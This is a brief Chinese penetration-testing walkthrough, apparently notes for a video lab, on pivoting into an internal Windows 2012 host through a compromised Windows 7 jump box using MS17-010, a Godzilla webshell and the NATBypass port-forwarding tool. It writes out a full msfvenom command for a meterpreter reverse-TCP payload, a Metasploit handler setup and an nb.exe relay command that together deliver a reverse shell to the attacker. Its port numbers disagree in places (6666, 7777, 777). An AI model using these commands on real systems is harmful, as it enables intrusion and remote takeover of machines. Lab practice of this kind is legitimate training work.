0.实际操作视频,请移步
https://www.bilibili.com/video/BV1de411j7Y1/
1.NatByPass(NB)简介
网络穿透工具,是lcx在go语言下的实现
https://www.bilibili.com/video/BV1de411j7Y1/
https://github.com/cw1997/NATBypass/releases/tag/v1.0.1
3.利用ms17-010获取win7跳板机shell
4.运行单向路由
5.启动socks代理
6.设置proxychains
7.利用web漏洞获取webshell,利用哥斯拉上传木马
8.生成木马,上传木马到目标机器并执行
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.10.7 lport=8888 -f exe > shiliu.exe
9.启动msf监听
msf监听6666端口
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.1.5
set lport 7777
run
10.上传木马到win2012执行,反弹shell到跳板机10.10.10.7的8888端口
11.用msf在win7的shell下执行nb.exe,本地开始监听8888端口,当8888端口上接收到来自客户端10.10.10.13的主动连接之后,
nb将主动连接msf监听的7777,并且负责8888端口和kali:7777之间的数据转发。
nb.exe -tran 8888 192.168.1.5:7777
12.另外运行一个msf,启动监听777端口,接收到shell
